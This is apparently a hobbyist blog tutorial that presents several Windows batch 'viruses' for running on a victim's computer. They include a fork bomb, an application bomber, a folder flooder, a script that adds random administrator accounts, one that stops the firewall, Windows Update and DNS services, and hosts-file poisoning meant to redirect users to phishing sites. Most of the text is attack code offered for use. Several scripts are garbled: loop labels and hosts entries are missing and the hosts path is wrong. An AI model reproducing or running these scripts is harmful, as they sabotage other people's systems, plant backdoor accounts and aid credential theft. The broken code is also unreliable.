Simple Batch Virus

virus :

There were few things that are un-covered in most of the batch programs, and that is nothing but the dark-side of the batch. Batch program offers its programmers to create their custom viruses just by misusing the way the command works, which leads to the creation of batch viruses.


Folder Replicator Virus:

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again

and again and keeps on creating a folder with same name, until a user stops it.

  • Just open up a notepad, copy and paste the below code

cd C:\Documents and Settings\username\Desktop
md Virus
cd Virus
goto loop
  • Save it as a batch file with the extension .bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username .
  • Then run it on the Victims computer to infect it.
  • Any how it doesn’t cause much harm, but replicates folder inside a folder and goes on.
  • Once more thing that you have to notice is that, this will create directory inside another directory with the same name, so it doesn’t looks like crap, since everything reside inside one main directory, more over deleting the root directory will purge all the clumsy thing done by this piece of code.

Fork Bomber :

Most of us have heard about the word ‘fork()’, which is used to create child process, like wise
fork bombing is nothing but calling a program by itself again and again with a infinite loop and making the system to crash by popping up hundreds of windows on the screen.

@echo off
Call fork.bat
Goto loop

Copy the above program and paste it in a notepad file and save it as ‘fork.bat’. The explorer command will open up the ‘documents’ directory, and it is given inside a loop, then the same batch file is
called again which in turn opens up multiple documents rolled out in a loop, likewise it goes on by calling the program itself again and again until the system crashes or hangs up.

Application Bomber:

Application bomber is a superset of window bomber, this has a close relation to the above given fork bomber program, where in this ‘application bomber’ we don’t call the program using the name itself (simply known as fork), where as we are going to open up applications continuously using a loop.

@echo off
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop

When the above given batch program is executed, it will open up the following applications such as notepad, word document, Microsoft paint, WordPad, command prompt, my documents, control panel, and calculator in an infinite loop causing the system to collapse and as a result the system simply crashes or reboots. Just imagine the same using a fork concept; oops! it will make the system crash immediately.

User Flooder:

The ‘user flooder’ program will create a number of user accounts with random numbers, and assign administrator rights to them by itself, moreover the password set for those user accounts were too
random numbers.

@echo off
set usr=%random%
net users %usr% %random% /add
net localgroup administrators %usr% /add
goto usrflood

Matrix Folder flooder:

The following piece of code is going to help flood you computer with junky folders. This program has the tendency to create more than 3000 folders in just less than a minute.

@echo off
mkdir %random%
goto loop

Service Disabler:

The following piece of code is used for stopping some critical windows services.

@echo off
net stop "Windows Firewall"
net stop "Windows Update"
net stop Workstation
net stop "DHCP Client"
net stop "DNS Client"
net stop "Print Spooler"
net stop Themes

This program when executed will stop the ‘windows firewall’ service that is required to block unwanted datagram’s coming from the internet, ‘windows update’ service that is required to update
windows patches and so on, ‘workstation’ service that is required for the computer to establish a peer to peer connection, ‘DHCP Client’ service that is required to register an available IP address from the DHCP server, ‘DNS Client’ service that is required to resolve FQDN (Fully qualified Domain Name) into its equivalent IP address, ‘print spooler’ service that is required to load the document to be printed in the spool, and then the ‘themes’ service that is required to offer Themes and other graphical appearance.
Likewise you may stop any of the services, even the anti-virus service that offers protection from malwares will be stopped in this way.
So when these services get stopped, it almost becomes impossible for the machine to offer the service what they are supposed to do so, hence the user has to manually enable and start these services again.

DNS poisoning:

Batch file can has the tendency to modify the transfer zones by editing the hosts.txt file that resides inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious websites instead of landing you to the legitimate website. This may also be used for phishing, i.e. redirecting you to a bogus website which looks exactly like the legitimate one, and then steal credentials.

@echo off
echo >> C:\windows\system32\drivers\etc\hosts.txt
echo >> C:\windows\system32\drivers\etc\hosts.txt

This program creates a new entry in the hosts file, so that whenever an user attempts to move to, he will be re-directed to another host that has the IP address of, likewise if the user attempts to login to the paypal account by typing in, he will be re-directed to another external bogus website that has the IP address of, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes.


Okay friends ..!!!

That's It for This article, we will see some more virus programs in some another article . 

If you have any doubt then feel free to comment .

HTML Comment Box is loading comments...